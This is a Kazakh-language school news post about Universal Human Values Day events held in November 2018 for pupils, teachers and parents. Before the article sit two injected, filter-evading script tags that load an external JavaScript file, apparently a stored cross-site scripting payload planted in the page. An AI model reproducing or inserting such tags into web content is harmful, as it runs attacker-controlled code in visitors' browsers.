<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.11.2018

А.Құсайынов

атындағы орта мектебі

2018-2019 оқу жылы

          Жалпыадамзаттық

Құндылықтар Күнін өткізу аясында «Бөбек» Ұлттық 

ғылыми-практикалық, білім беру және сауықтыру орталығы 2018 жылғы 23

қарашада Қазақстан Республикасының барлық білім беру ұйымдарында білім

алушылардың, педагогтардың және ата-аналардың белсенді қатысуымен адамның

рухани-адамгершілік әлеуетін арттыруға, құндылық бағдарларын, қоғамға қызмет

ету дағдыларын дамытуға бағытталған іс-шаралар бойынша А.Құсайынов атындағы орта

мектебінде де бірнеше іс-шаралар ұйымдастырылды. Бастауыш сынып мұғалімі

Б.Т.Алшынова 1-4 сыныптар арасында «Сүйіспеншілік-әрбір жүректе» атты тақырыпта

ұжымдық шығармашылық ісі мен рухани-адамгершілік тәрбиеге арналған

бейнероликтер көрсетті. Мақсаты оқушылар бойына жалпыадамзаттық құндылықты, сүйіспеншлік

пен мейірімділікті дарыту болып табылады.

           Ал 5-10 сынып

оқушылар арасында Досмагамбетова Г.Р. «Сүйіспеншілік-адамның басты қасиеті,

ақиқат-оның негізі, дұрыс әрекет-оның шынайы өмірі» атты тақырыпта біріккен

сынып сағатын ұйымдастырды. Мақсаты оқущылар бойына адамның рухани-адамгершілік

қасиетін арттыруға, мейірімділікке, жауапкершілікке, қоғамға қызмет етуде адал

болуға бағытталды. Тәрбие ісінің меңгерушісі Бейсенбай А. «Жалпыадамзаттық

құндылықтар-отбасы тәрбиесінің негізі» атты тақырыбында ата-аналарға дәріс

өткізді.

          Орындаған:   ТЖО

Бейсенбай А.

 

 

Просмотров: 917

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу